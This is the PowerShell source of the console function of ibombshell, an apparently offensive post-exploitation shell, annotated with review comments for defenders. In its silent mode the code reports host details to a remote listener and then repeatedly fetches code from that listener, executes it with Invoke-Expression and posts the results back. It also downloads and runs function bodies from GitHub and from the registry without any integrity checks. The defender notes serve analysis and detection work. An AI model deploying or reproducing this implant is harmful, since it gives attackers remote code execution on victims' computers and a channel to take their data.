# console: entry point of the ibombshell PowerShell console.
#
# Parameters:
#   -Silently    run without a prompt; commands are fetched from $uriConsole and
#                their output is posted back to it.
#   -uriConsole  base URL of the remote listener used in -Silently mode.
#   -id          identifier appended to the listener URLs; generated when empty.
#   -proxy       optional web proxy; "http://" is prepended when the value does
#                not already start with "http".
#
# Returns a plain message string (and does nothing else) on PowerShell < 3.
#
# Review notes for defenders, all taken from the code below:
#   * Every function body is obtained at run time (raw.githubusercontent.com or
#     the HKCU registry key) and passed to iex. No hash, signature or pinned
#     commit is checked; the URLs track the mutable `master` branch.
#   * In -Silently mode whatever the listener returns is passed to iex. No
#     authentication of the listener is visible in this function.
#   * Observable artefacts: System.Net.WebClient downloads followed by
#     Invoke-Expression, the registry key HKCU:\Software\Classes\ibombshell,
#     requests to "<uriConsole>/newibombshell/<id>" and "<uriConsole>/ibombshell/<id>",
#     and a fixed 5-second sleep between polls.
function console{
    param(
        [Switch] $Silently,
        [String] $uriConsole,
        [String] $id,
        [String] $proxy
    )
    # Normalise the proxy value so System.Net.WebProxy receives a URI with a scheme.
    if ($proxy){
        if(-not $proxy.startswith("http")){
            $proxy = "http://"+$proxy
        }
    }
    # Version gate: the caller only gets this string back, no exception is raised.
    if ($PSVersionTable.PSVersion.Major -lt 3) {
        return "Upgrade your powershell to version 3 or higher"
    }
    # loader: build "<RawBase><RawFunctions><command>" and return the downloaded text.
    # Every call site in this function pipes the result to iex, so the remote
    # content is executed as-is.
    function loader{
        param(
            [Parameter(Mandatory)] [string] $command,
            [Parameter(Mandatory)] [string] $RawBase,
            [Parameter(Mandatory)] [string] $RawFunctions
        )
        $RawURL = $RawBase + $RawFunctions + $command
        return make_request -URL $RawURL
    }
    # make_request: minimal HTTP helper built on System.Net.WebClient.
    #   -method  "GET" (default) or "POST"; any other value takes the GET path.
    #   -URL     target address.
    #   -data    request body for POST.
    # $proxy is not a parameter here; it is read from the enclosing console scope.
    # Errors from WebClient are not caught here and propagate to the caller.
    function make_request{
        param(
            [string] $method="GET",
            [Parameter(Mandatory)] [string] $URL,
            [string] $data
        )
        $wc = new-object system.net.WebClient
        if ($proxy){
            $prx = new-object System.Net.WebProxy
            $prx.Address = $proxy
            $wc.proxy = $prx
        }
        if ($method -eq "POST"){
            # The response string is not assigned, so it becomes the function output.
            $wc.UploadString($url, "POST", $data)
        }
        else{
            # The body is decoded as ASCII regardless of the server's charset.
            $webpage = $wc.DownloadData($url)
            $data = [System.Text.Encoding]::ASCII.GetString($webpage)
            return $data
        }
    }
    # READFUNCTIONS BEGIN
    # readFunctions: reload previously stored functions from the registry.
    # Internal helpers are executed immediately; the remaining functions are
    # returned as one code string (the caller pipes it to iex).
    function readFunctions{
        $path = 'HKCU:\Software\Classes\ibombshell'
        $path_internals = 'hkcu:\software\classes\ibombshell\internals'
        # Internal helpers: executed inside runRead, return value discarded
        $null = (runRead -path $path_internals -isCommand $false)
        # User-visible functions: collected as text
        $code = (runRead -path $path -isCommand $true)
        return $code
    }
    # runRead: read every subkey of $path and use its property values as code.
    #   -path       registry key whose children hold the stored functions.
    #   -isCommand  $false: run each stored body with iex right away;
    #               $true:  append it to the returned string and register the
    #                       key name through addCommand.
    # Returns the accumulated code string, or nothing when $path does not exist.
    # Side effect: changes the current location to hkcu: and then to c:, so the
    # caller's original location is not restored.
    function runRead{
        param(
            [Parameter(Mandatory)] [String] $path,
            [Parameter(Mandatory)] [Boolean] $isCommand
        )
        if(test-path $path) {
            $listFunctions = (Get-ChildItem $path).Name
            $code = ""
            # The names in $listFunctions are passed to Get-Item below as paths;
            # presumably this cd is what lets them resolve - confirm.
            cd hkcu:
            foreach($i in $listFunctions) {
                # Leaf name of the registry key
                $name = $i.split("\")[-1]
                if (($name -ne "internals") -and ($name -ne "console")){
                    # Collect the value of every property stored under the key.
                    $aux = ((Get-Item -Path "$i" | Select-Object -ExpandProperty Property) | ForEach-Object { New-Object psobject -Property @{"property"=$_; "Value" = (Get-ItemProperty -Path "$i" -Name $_).$_}}).Value
                    if (-not $isCommand) {
                        # Registry content is executed directly; anything able to
                        # write this HKCU key controls what runs here.
                        $aux | out-string | iex
                    } else {
                        $code += ($aux | out-string) + "`r`n"
                        addCommand -command $name > $null
                    }
                }
            }
            c:
            return $code
        }
    }
    # READFUNCTIONS END
    # NOTE(review): the banner is ASCII art; in this copy its line layout appears
    # to have been flattened. The literal is kept exactly as found.
    $banner = " ,--.!, _ ____ __ _____ __ ____ __/ -*- (_) __ )____ ____ ___ / /_ / 
___// /_ ___ / / / ,d08b. '|`` / / __ / __ \/ __ ``__ \/ __ \\__ \/ __ \/ _ \/ / / 0088MM / / /_/ / /_/ / / / / / / /_/ /__/ / / / / __/ / / ``9MMP' /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/"
    # Download locations for function bodies and for the list of available functions.
    # Both point at the `master` branch, so the fetched code can change between runs.
    $gtRawBase = "https://raw.githubusercontent.com/Telefonica/ibombshell/master/"
    $gtRawFunctions = "data/functions/"
    $functionsList = "https://raw.githubusercontent.com/Telefonica/ibombshell/master/functions.txt"
    # Global state: names the prompt accepts as loaded functions, and internal helper names.
    [System.Collections.ArrayList]$global:functionsLoaded = "showcommands" , "showfunctions" , "quit"
    [System.Collections.ArrayList]$global:internalFunctions = "detect-OS", "printprompt" , "printMessage", "printData", "isadmin", "commandsearch", "addcommand"
    # Loop condition for the main loop below; it is not changed inside this function.
    $global:condition = $true
    if($Silently) {
        # To review (original author's note): errors are suppressed from here on.
        $ErrorActionPreference = "SilentlyContinue"
        # Fetch and define the two helpers this mode needs.
        loader -command "generateid" -RawBase $gtRawBase -RawFunctions $gtRawFunctions | iex
        loader -command "isadmin" -RawBase $gtRawBase -RawFunctions $gtRawFunctions | iex
        if(-not($id)) {
            $id = generateid
        }
        # Collect host information sent with the registration request
        if (isadmin){
            $admin = "admin"
        }else {
            $admin = "no"
        }
        $info = Get-CimInstance -ClassName Win32_OperatingSystem
        $os_version = ($info.caption | Out-String).TrimEnd("`r`n")
        $os_arch = ($info.OSArchitecture | Out-String).TrimEnd("`r`n")
        # Register this instance with the listener
        if($uriConsole.Length -ne 0) {
            # Retry every 5 seconds with no upper bound until the POST succeeds.
            while ($true) {
                try {
                    # Values are interpolated into the JSON text without escaping.
                    $info = @"
results={"os_version":"$os_version", "os_arch":"$os_arch", "admin":"$admin"}
"@
                    $req = make_request -method "POST" -URL "$uriConsole/newibombshell/$id" -data $info
                    break
                } catch {
                    sleep 5
                }
            }
        }
    } else{
        $path = 'hkcu:\software\classes\ibombshell'
        if((Test-Path $path)){
            # Stored functions exist: rebuild them from the registry and execute the code.
            readfunctions | iex > $null
        }else{
            # No stored functions: download the default set and define each one.
            try{
                $toLoad = "system/detect-OS", "showfunctions", "showcommands", "addcommand", "commandsearch", "quit", "saveandloadfunctions", "version", "isadmin", "print/printprompt", "print/messagedata"
                foreach($function in $toLoad){
                    loader -command $function -RawBase $gtRawBase -RawFunctions $gtRawFunctions | iex
                }
                addcommand -command "savefunctions" > $null
                addcommand -command "deletefunctionsreg" > $null
                addcommand -command "version" > $null
            }catch {
                # Any failure in the block above is reported as a connectivity problem.
                write-host "Check Internet Connection"
                sleep 1
            }
        }
        try{
            # Download the list of functions that can be loaded on demand
            $list = make_request -URL $functionsList
        }catch{
            $list = ""
        }
        # detect-OS is one of the downloaded helpers; its result selects the
        # line delimiter used to split the list.
        $detected_os = detect-OS -basic
        if($detected_os -eq "windows") {
            $delimet = "`n"
            $delimet2 = "`r`n"
        } else {
            $delimet = "`n"
            $delimet2 = "`n"
        }
        $global:commandList = $list.split($delimet)
        $localcommandlist = $list.split($delimet2)
        clear-host
        write-host -ForegroundColor Yellow $banner
        write-host
        write-host -ForegroundColor Red "Use showcommands to see what can be loaded or showfunctions to see what can be run"
        write-host
    }
    # Counts failed polls in -Silently mode. It is not reset after a successful
    # poll, so it counts failures in total rather than consecutive ones.
    $try_connection = 0
    while($global:condition) {
        if($Silently) {
            if($uriConsole.Length -ne 0) {
                try {
                    # Poll the listener for the next piece of code to run.
                    $content = make_request -URL "$uriConsole/ibombshell/$id"
                } catch {
                    $content = ""
                    $try_connection += 1
                    if ($try_connection -eq 5) {
                        # Leave the loop once the fifth failed poll is counted
                        break
                    }
                }
                if($content.length -gt 0) {
                    # The response body is executed unmodified.
                    $results = $content | iex
                    # NOTE(review): this literal is split across two lines in this copy; kept as found.
                    if (-not $results) {$results = "Executed. 
No results have been returned from the command"}
                    # Flatten non-string output into one string before sending
                    if ($results.GetType().Name -ne "String") {
                        $send = ""
                        foreach($i in $results) {
                            # '\n' is single-quoted: it appends a backslash and an "n", not a newline.
                            $send = $send + $i + '\n'
                        }
                        $results = $send
                    }
                    $results = @"
results=$results
"@
                    $r = make_request -method "POST" -URL "$uriConsole/ibombshell/$id" -data $results
                }
            }
            sleep 5
        } else {
            # Interactive mode: read one line from the operator and dispatch it.
            printprompt
            $command = Read-Host
            $command = $command.TrimStart()
            if(($command.Length -eq 0)) {
                continue
            }
            if ($command -eq "cls" -or $command -eq "clear") {
                cls | iex
                continue
            }
            if ($command.startswith("#")){
                # "#<text>": evaluate the text between the first and second "#" as PowerShell.
                $c = $command.split("#")
                if ($c.Length -gt 1){
                    $c = $c[1].Trim()
                    if ($c){
                        $c | iex
                    }
                }
            } elseif ((commandsearch -command $command.split(" ")[0] -list $functionsLoaded) -and ($command.Split(" ")[0].Equals("loaderext"))) {
                # loaderext: the command's output is evaluated a second time.
                $command | iex | iex
            } elseif (commandsearch -command $command.split(" ")[0] -list $functionsLoaded) {
                # First word names an already loaded function: run the whole line.
                $command | iex
            } elseif (commandsearch -command $command -list $localcommandlist) {
                # The line matches an entry of the downloaded list: register, fetch and define it.
                try {
                    $result = addcommand -command $command
                    if ($result -ne -1) {
                        loader -command $command -RawBase $gtRawBase -RawFunctions $gtRawFunctions | iex
                        printMessage -message "Function Loaded"
                    }else{
                        printMessage -message "That function is already loaded"
                    }
                } catch {
                    printMessage -message "Something went wrong loading the module"
                    # Inside double quotes only $_ is expanded; ".Exception.Message" is appended as literal text.
                    printMessage -message "$_.Exception.Message"
                    # Presumably $result is the list index returned by addcommand - confirm;
                    # it is unset if addcommand itself threw.
                    $global:functionsLoaded.removeat($result)
                }
            } else {
                printMessage -message "Stupid Command!"
            }
        }
    }
}